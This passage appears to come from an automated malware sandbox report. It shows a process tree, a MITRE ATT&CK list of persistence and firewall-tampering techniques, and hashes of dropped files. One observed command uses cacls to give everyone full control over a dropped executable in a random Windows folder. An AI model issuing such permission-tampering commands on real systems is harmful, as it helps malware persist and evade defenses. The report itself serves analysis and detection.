PID:5932
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qnbnbcbg\tpmbzsb.exe /p everyone:F1⤵PID:2996
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5972
-
-
C:\Windows\system32\cacls.execacls C:\Windows\qnbnbcbg\tpmbzsb.exe /p everyone:F2⤵PID:5988
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
34.3MB
MD5580c1259352a9b510c59b2de1996368e
SHA1101e31e852e3cb5cc9770f217cef6bb33f90c1b8
SHA2569394aaf9fd27505267e2e098f59d64245ae852ddc1ead8e4252a3a57c2974d13
SHA51200057452a5d75140ad9e0e209a5c46e1b4493050730045c4220d90dc73a73486ccf2d37b2389f2d16a9e95805bcc9c2374f1e3374aa7b68bc6ac2f6a4b537dd2
-
Filesize
1.2MB
MD56ebc1a83098e9b637c59db0c4800c7a0
SHA167c323bd529feebb5f3a71e939cd538f6d556784
SHA256b5499161ee7d756c1923d4a03fc35eeaa58d10ad018b9e85bb5812c4334f4037
SHA512bd9e8de46adba75ad9f7d4016afe5341357ed9605bf09fd202cbca3a4cfdf571b01768f064bff4c30f11259b1b0c2f130321e69ee3712b5210e4aff4e843d0de
-
Filesize
26.3MB
MD5b7c63423ff0ab1049ce23fc5838cafd5
SHA165204c2cada7a40d86c902c2d945fbf1b64e6424
SHA2568a483f3abb7bbd33992dd1926b73e0e7e170d171ffd9d6b881e56ece9d49b04f
SHA5123fd251d46a6efa456ded33b01656ffdaab093a94b084b0b2d2b2d445f0d7112d5f97d3a51a5f681dc1a38eb53ef793927e0ede864f1a9618f8e9f4427bc767d2
-
Filesize
4.2MB
MD5ff04f296c2b58723c2158a16f81edb65
SHA19e0fd952be9cdfcd4663dc2aa0ce5c8ceadde9b0
SHA2568effaa671e33266a0149144fa0de66fc3ba60ee822de2d590d86ce9fdcedf455
SHA5128963a3bd9e777cc028793ba85dd4ad5bea5042c4cc5c17fb86db6cedeed6094b5bb12a05a2999c20dde9c3780fc2d3d2e95c2c0b47d37c0f1c3d66f9e360488c
-
Filesize
4.0MB
MD5e76b6f79f6cfe09c067ce3cfa248240a
SHA1200e0a7ee3d25ca9d4863c947c53e80533b7efe1
SHA256a5781b3da25cf285ffb780f630c94a3b2d13be677017b568020def484e2aea01
SHA512573255609bf648e094858d5c13a97b8d7b6b25d352804b5dfd7ffc98ed13fde0177a57f86444b5cf23ebc1971a5e72b2fbd3aa46ec2ac5c3849af893c8a811e8
-
Filesize
2.9MB
MD5e8d9c75116950794338c0bfc52daea16
SHA1b25b6c47a3df3c89c9c6e0fc74d4d41e12409a15
SHA2566c1e7f836ac7864b422c77c203456c13a8f683c581710e73970149cbf1a926fa
SHA5126814f659f6d56007aa9113c1f1f270d6c09fbda763e62014cd2a14d4b568461dfe12127c539b7cf52d05378671ac311087ff87a2b3503400c6cf9b941b2a7db1
-
Filesize
7.5MB
MD5f4d75d2fa542b2f7cf1580703fd29f49
SHA1065c5513d83648426342a6c2161cccc9f2692824
SHA2561df7ec91e3c6c3cf4f987eb81de3d576b479e21b098f8e7e8ec7cbad39c8d613
SHA512014674644bfb9536c0c3ae0e891d09372050dd98ea1e2fd2b8825f77b2da5bbab3c457fef09f181d83dd0e71f5e73893a9076f82be31994875eadffd11c0e20d
-
Filesize
45.7MB
MD5a25e93b713c9f47f4fb9cb9fe3e1119b
SHA18b3d1ac92b25f43b06a10e9fff806c1e859cb9ef
SHA256aed9b2dbe1192faf269e9f441af80775323a2a2dd67f9ad7923c6c0f9b3c9083
SHA512ac5b6e80e401f0aacc2c5641bc86eb64acdc78af669699c86795a4359c2a188d8da7fa111bb4d3a2f68ce446187e87956bf11478527773d91e3cf2eefc21fe0b
-
Filesize
810KB
MD52679ae2490fe1d27c8810ee9a06ef706
SHA16e1649dace13d101798b78c694f7b358dd06ce27
SHA256c65cffaaa1bfd7d8f3aff716ed1955dd24b801fac0b517f814e866df4620063a
SHA5122d1c1da230bae625ce565af0a28b554669ff086eabd6069cd769692a8d6601466099f5760157566ceef418e0c10d679737bb17b6d69225736f9dd77deefe7ee1
-
Filesize
8.7MB
MD51433ea944fdeac91ccde44d68324b5a8
SHA150a58d2b56ebe5301d8ea5fa293cce6eda3ae600
SHA256d75229eee33a0ac690807b2861838cd42602e061e7452ad80aa9ee3bc6c713ca
SHA512433ae0968cd20148d572ac2f963da1c1301f229a3c5e68f5f291126653376504ee00a5bdc93016f4ac1e4779e165a78e8cb6e4160631310566edd6679f99e22f
-
Filesize
2.8MB
MD503642cf2f0c606f81a9358487a9545a3
SHA18aeb24faa9d27c8ffeb14f2fff5b6c47661d0659
SHA256718eaadcceea58cb755274d9c36b1373ddff0045730a39ed1ec83c0e10e3620d
SHA5124cf28ea580f8b662c9f8b417cc4ef93b465b9f6e1ea9d5fdfc1b5bf60d186fe0b11a977500bd0f30d609fad2f0bdce707bce3d9c34e8e86a57acbce8f3c9ecca
-
Filesize
21.0MB
MD59e9e8de8bf5dd2bd2ac37dac0f4cf81a
SHA14e65eee8d5d5d6772ec60d961c1b8243e5753e8f
SHA25652bff4a9865287abb82d8ef0d9d7f21a17bbed4adfeae0788e4e7208cfa3ade2
SHA512c550880440bbc0e1c4bd8d54735cf166d2521ce60b67d92197372a9d0bac194ffc5f08ccb65ea160e2985342dc94218b45479009c8e76787f7e282581fa007ba
-
Filesize
8.5MB
MD58ffe6e5320cdfff1c6614c9c01b43108
SHA17379870912cf7c3a8dfa0312254ae5d104ca809e
SHA25694e39e27f60153e4885b2e2099b0eda8fde8a14585338413e07677ae2f08514e
SHA51227c405f4b04663754727b8d3d4b09f482f252f240feb6c89d60f79989cbb7fe0c9990c489a37620d2bfafc567d7bbbd24f91ff9c509a155813526937ca49893e
-
Filesize
1019KB
MD53d5254683b72df4d0ff0ce2be23d3c85
SHA14d9e5683f2d8948e54630fd8e43f4651d78cfdda
SHA256ea0e9f11e0cec42391fef6cf4dc2870ab57d4ee8cbbc86eccd06573f9653cd11
SHA5121f1cc1f77aee92853333b339a66a064a0abe43fbf1022af900739804fcd7b4a99d8572cfde2483c0ae864f6e4cd7b2b0673b584e731cd07c7e1bc288853d33ba
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
7.6MB
MD5faa4c388d5851491e1b706068deadb2e
SHA19f7ae3fdf7d45ba20a5c1d1ee8a15bbc9b7d2fcc
SHA25676216c4a9f8bc7812701eb1e6e5f25ad0d5df913e039246198a4417ff6bd127c
SHA512faa63f8bf577c81c056e49ac9a1d74d1fc412693b517ac4fa8e2f700a04935b44bac58c8c6f2aaccd3578bbcfb4d4691429cb38b2f310e57d0fd5aa26e24b1ab
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376